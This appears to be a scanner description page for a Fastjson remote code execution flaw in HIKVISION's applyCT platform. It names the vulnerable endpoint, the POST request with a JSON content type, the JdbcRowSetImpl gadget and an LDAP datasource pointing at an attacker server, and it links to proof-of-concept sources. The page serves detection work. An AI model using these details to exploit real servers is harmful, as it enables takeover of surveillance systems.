HIKVISION applyCT Remote Code Execution Scanner

The HIKVISION applyCT is a comprehensive security management platform widely used by businesses and organizations for surveillance and security management. Developed by HIKVISION, a leading provider of security products and solutions, this platform helps users monitor multiple security devices efficiently. It provides a centralized interface for managing security devices, making it an integral part of security operations. HIKVISION applyCT is integrated with advanced analytics to enhance surveillance capabilities. The platform is adopted by a diverse range of sectors, including government, commercial, and industrial for robust security infrastructure. Its scalability allows it to cater to both small-scale and large-scale surveillance needs.

Remote Code Execution (RCE) is a severe vulnerability that allows an attacker to execute arbitrary code on a target machine remotely. This type of vulnerability arises when user input is not properly validated, allowing malicious payloads to be executed within the system. RCE can lead to complete system compromise, providing an attacker with full control over the affected system. Exploiting an RCE vulnerability can result in unauthorized data access, system manipulation, or even a distributed network attack. The detection of this vulnerability is crucial for maintaining system integrity and preventing unauthorized exploits. Timely identification and remediation are essential to safeguard data and resources from potential attacks.

The vulnerability in the HIKVISION applyCT platform involves the processing of JSON data via the Fastjson library. An attacker can exploit this by crafting a JSON payload to interact with a specific Java class, `JdbcRowSetImpl`, which allows remote code execution through the LDAP protocol. The malformed payload is sent to the `/bic/ssoService/v1/applyCT` endpoint using a POST request with the `Content-Type` set to `application/json`. By manipulating the datasource parameter to point to an untrusted LDAP server, the attacker can gain control over the server. The vulnerability arises from insufficient input validation, enabling arbitrary class loading and execution of unauthorized code.

Exploitation of this RCE vulnerability can have severe consequences, including unauthorized access to sensitive information, data breaches, and full control over the server. An attacker could inject malicious code to perform any number of actions, from stealing confidential data to disrupting service operations. Such security breaches can lead to financial loss, reputational damage, and legal liabilities. It also poses risks of further propagation of attacks within the network, affecting additional systems and applications. Addressing this vulnerability is critical to prevent unauthorized activities and ensure the safety and reliability of the system operations.

REFERENCES

• https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/iot/HIKVISION/HIKVISION%20%E7%BB%BC%E5%90%88%E5%AE%89%E9%98%B2%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0%20applyCT%20Fastjson%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.md
• https://github.com/MrWQ/vulnerability-paper/blob/master/bugs/%E6%B5%B7%E5%BA%B7%E5%A8%81%E8%A7%86%E7%BB%BC%E5%90%88%E5%AE%89%E9%98%B2%20Fastjson%20%E5%86%85%E5%AD%98%E9%A9%AC%E6%89%93%E6%B3%95.md
• https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/hikvision-fastjson-rce.yaml